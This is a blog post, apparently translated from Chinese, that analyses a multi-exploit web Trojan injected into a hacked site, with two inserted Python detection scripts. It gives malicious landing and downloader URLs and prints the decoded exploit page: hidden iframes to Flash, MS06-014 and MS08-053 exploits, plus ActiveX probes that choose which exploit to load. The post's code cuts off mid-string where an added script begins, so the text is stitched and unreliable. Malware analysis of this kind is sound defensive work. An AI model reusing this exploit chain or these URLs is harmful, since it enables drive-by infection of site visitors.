http://docs.google.com/Doc?id=ddgxtn83_36ghzrpjgh
Today, while visiting amxku's blog, I saw the article <Ali is also down, alas> (http://www.amxku.net/aliued-cn-hacked/) and tracked the web Trojan it describes. Here is the tracking and analysis process.
amxku captured a screenshot.
In the screenshot, the blue code selected with the mouse is the Trojan code. Curious, I tracked this web Trojan.
Enter the web Trojan address http://www.dns1999.cn/d3/zz3.htm?X-01 in Firefox and press Enter.
Right-click and view the page source.
The code is very simple; there are only two lines.
The first line is the real web Trojan address, and the second line is a 51la statistics code. The Trojan author evidently cares a lot about his visitor statistics.
Continue tracking: http://www.dns1999.cn/d3/123.htm
View the source: it is an encrypted (obfuscated) web Trojan.
Encrypted code is a headache, but it doesn't matter. With the right tools, the Firebug plug-in for Firefox lets us easily see the decoded source of the web Trojan.
Haha, it's a hybrid web Trojan that attacks with several vulnerabilities at once.
document.write("<iframe width=20 height=0 src=flash.htm></iframe>");
This is the Flash file overflow vulnerability. Continue.
Okay
This exploit first checks the Flash version. It is an old vulnerability that has already been thoroughly analyzed online.
Let's look at the address of the downloader. Analyzing the swf file is tiring and thankless, so we use a simpler way to get the downloader address: set up a vulnerable environment in a virtual machine and capture packets while the exploit runs. The Flash plug-in version in my virtual machine is 115, which happens to be a vulnerable version.
This way we capture the address of the Trojan installer:
http://yang3535234.3322.org/OK.exe
We are in no rush to analyze the downloader; let's look back at the other web Trojans first.
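Pulling the downloader address out of the capture can be done mechanically instead of by eye. The following is an added example, not code from the post or its author: it takes reassembled HTTP request/response pairs, as a packet capture of the infection chain in the VM would yield, and flags the pair that fetches the executable. The sample streams are constructed here; only the hosts and paths come from the post, while the headers, bodies and the function names are assumptions.

```python
# Constructed sample: three reassembled HTTP request/response pairs of the kind a
# capture of the infection chain in the VM yields. The hosts and paths are the
# ones named in the post; the headers and bodies are made up for this example.
SAMPLE_STREAMS = [
    ("GET /d3/zz3.htm?X-01 HTTP/1.1\r\nHost: www.dns1999.cn\r\n\r\n",
     "HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n<html>(landing page, constructed)</html>"),
    ("GET /d3/flash.htm HTTP/1.1\r\nHost: www.dns1999.cn\r\n\r\n",
     "HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n<html>(flash exploit page, constructed)</html>"),
    # the downloader stage: an executable served with a misleading Content-Type
    ("GET /OK.exe HTTP/1.1\r\nHost: yang3535234.3322.org\r\n\r\n",
     "HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\nMZ\x90\x00\x03\x00(truncated, constructed)"),
]

EXECUTABLE_EXTENSIONS = (".exe", ".dll", ".scr", ".com", ".pif")
BINARY_CONTENT_TYPES = ("application/x-msdownload", "application/x-msdos-program",
                        "application/octet-stream")


def parse_request(raw):
    """Return (method, absolute URL) for a raw HTTP request, or None if malformed."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    parts = lines[0].split()
    if len(parts) < 2:
        return None
    method, target = parts[0], parts[1]
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    if target.lower().startswith(("http://", "https://")):
        url = target  # absolute-form request line (proxy style)
    else:
        url = "http://" + headers.get("host", "") + target
    return method, url


def parse_response(raw):
    """Return (content-type, body) for a raw HTTP response."""
    head, _, body = raw.partition("\r\n\r\n")
    content_type = ""
    for line in head.split("\r\n")[1:]:
        name, sep, value = line.partition(":")
        if sep and name.strip().lower() == "content-type":
            content_type = value.strip().split(";")[0].strip().lower()
    return content_type, body


def find_payload_downloads(streams):
    """Flag request/response pairs that look like the fetch of the dropped executable."""
    hits = []
    for request_raw, response_raw in streams:
        parsed = parse_request(request_raw)
        if parsed is None:
            continue
        _method, url = parsed
        content_type, body = parse_response(response_raw)
        path = url.split("?", 1)[0].lower()
        reasons = []
        if path.endswith(EXECUTABLE_EXTENSIONS):
            reasons.append("executable extension")
        if content_type in BINARY_CONTENT_TYPES:
            reasons.append("binary content-type")
        # kits often lie in Content-Type, so also look for a PE header in the body
        if body.startswith("MZ"):
            reasons.append("MZ header in body")
        if reasons:
            hits.append({"url": url, "content_type": content_type, "reasons": reasons})
    return hits


if __name__ == "__main__":
    for hit in find_payload_downloads(SAMPLE_STREAMS):
        print(hit["url"], hit["content_type"], ", ".join(hit["reasons"]))
```

The body check matters more than the extension: a downloader URL does not have to end in .exe, and the Content-Type here is text/html, so only the MZ header at the start of the response body would catch a renamed payload.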
document.write("<iframe width=20 height=0 src=14.htm></iframe>"); // MS06-014 vulnerability
document.write("<iframe width=100 height=0 src=as.htm></iframe>"); // I was not familiar with this one; a Baidu search shows it is MS08-053, the Windows Media Encoder wmex.dll ActiveX Control Buffer Overflow published on milw0rm.com on September 10 (http://milw0rm.com/exploits/6454)
try { var f;
var gg = new ActiveXObject("GLIEDown.IEDown.1"); }
catch (f) {};
finally { if (f != "[object Error]") { document.write("<iframe width=100 height=0 src=lz.htm></iframe>"); } } // contact
try { var m;
var hh = new ActiveXObject("Downloader.DLoader.1"); }
catch (m) {};
finally { if (m != "[object Error]") { document.write("<iframe width=100 height=0 src=sina.htm></iframe>"); } } // Sina video
try { var n;
var ll = new ActiveXObject("xxxxxxx"); }
catch (n) {};
finally { if (n != "[object Error]") { document.write("<iframe width=100 height=0 src=office.htm></iframe>"); } } // office
try { var B;
var mm = new ActiveXObject("NCTAudioFile2.AudioFile2.2"); }
catch (B) {};
finally { if (B != "[object Error]") { document.write("<iframe width=100 height=0 src=nctaudiofile.htm></iframe>"); } }
// NCTAudioFile; I am not very familiar with this vulnerability.
function test()
{
rrooxx = "IER" + "
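The pattern in the decoded page above, hidden iframes plus try/catch probes of ActiveX ProgIDs that decide which exploit page to load, is easy to recognize statically. The following is an added example, not code from the post or its author: it runs over a cleaned-up copy of the landing-page logic quoted above (constructed here; the ProgIDs and iframe names are the ones the post lists, including the post's own "xxxxxxx" placeholder), lists every iframe the page writes and whether it is invisible, and pairs each ProgID probe with the iframes its branch loads. The function names and the suspicious-page rule are assumptions.

```python
import re

# Constructed sample: a cleaned-up copy of the landing-page logic quoted in the
# post. ProgIDs and iframe names are the ones the post lists; "xxxxxxx" is the
# post's own placeholder.
SAMPLE_LANDING_PAGE = r'''
document.write("<iframe width=20 height=0 src=flash.htm></iframe>");
document.write("<iframe width=20 height=0 src=14.htm></iframe>");
document.write("<iframe width=100 height=0 src=as.htm></iframe>");
try { var f; var gg = new ActiveXObject("GLIEDown.IEDown.1"); }
catch (f) {}
finally { if (f != "[object Error]") { document.write("<iframe width=100 height=0 src=lz.htm></iframe>"); } }
try { var m; var hh = new ActiveXObject("Downloader.DLoader.1"); }
catch (m) {}
finally { if (m != "[object Error]") { document.write("<iframe width=100 height=0 src=sina.htm></iframe>"); } }
try { var n; var ll = new ActiveXObject("xxxxxxx"); }
catch (n) {}
finally { if (n != "[object Error]") { document.write("<iframe width=100 height=0 src=office.htm></iframe>"); } }
try { var B; var mm = new ActiveXObject("NCTAudioFile2.AudioFile2.2"); }
catch (B) {}
finally { if (B != "[object Error]") { document.write("<iframe width=100 height=0 src=nctaudiofile.htm></iframe>"); } }
'''

IFRAME_RE = re.compile(r"<iframe\b([^>]*)>", re.IGNORECASE)
ATTR_RE = re.compile(r"(\w+)\s*=\s*['\"]?([^\s'\">]+)['\"]?")
ACTIVEX_RE = re.compile(r"new\s+ActiveXObject\s*\(\s*['\"]([^'\"]+)['\"]\s*\)")


def _dimension(value):
    """Parse a width/height attribute; an unparsable value counts as visible (None)."""
    try:
        return int(value)
    except (TypeError, ValueError):
        return None


def extract_iframes(script):
    """Return one dict per iframe the script writes: position, src, size, hidden flag."""
    frames = []
    for m in IFRAME_RE.finditer(script):
        attrs = {k.lower(): v for k, v in ATTR_RE.findall(m.group(1))}
        width = _dimension(attrs.get("width"))
        height = _dimension(attrs.get("height"))
        frames.append({
            "pos": m.start(),
            "src": attrs.get("src", ""),
            "width": width,
            "height": height,
            # a zero-pixel dimension makes the frame invisible to the visitor
            "hidden": width == 0 or height == 0,
        })
    return frames


def extract_probes(script):
    """Pair each ActiveXObject ProgID probe with the iframes written in its branch."""
    frames = extract_iframes(script)
    probes = [(m.start(), m.group(1)) for m in ACTIVEX_RE.finditer(script)]
    result = []
    for i, (start, progid) in enumerate(probes):
        # the branch of a probe runs up to the next probe (or the end of the script)
        end = probes[i + 1][0] if i + 1 < len(probes) else len(script)
        loads = [f["src"] for f in frames if start < f["pos"] < end]
        result.append({"progid": progid, "loads": loads})
    return result


def summarize(script):
    """Summarise a landing page: unconditional and probe-gated iframes, hidden count."""
    frames = extract_iframes(script)
    probes = extract_probes(script)
    probe_positions = [m.start() for m in ACTIVEX_RE.finditer(script)]
    first_probe = min(probe_positions) if probe_positions else len(script)
    unconditional = [f["src"] for f in frames if f["pos"] < first_probe]
    hidden = sum(1 for f in frames if f["hidden"])
    return {
        "iframes": len(frames),
        "hidden_iframes": hidden,
        "unconditional": unconditional,
        "probes": probes,
        # hidden frames combined with installed-control fingerprinting is the
        # signature of a multi-exploit landing page (assumed rule for this example)
        "suspicious": hidden > 0 and len(probes) > 0,
    }


if __name__ == "__main__":
    report = summarize(SAMPLE_LANDING_PAGE)
    print("always loaded:", report["unconditional"])
    for probe in report["probes"]:
        print("probe", probe["progid"], "->", probe["loads"])
    print("hidden iframes:", report["hidden_iframes"], "suspicious:", report["suspicious"])
```

Run on the decoded page this gives three unconditional exploit frames (flash.htm, 14.htm, as.htm) and one gated frame per ProgID, which is the same inventory the post builds by hand; the ProgID list is also what you would feed a kill-bit policy or a proxy rule.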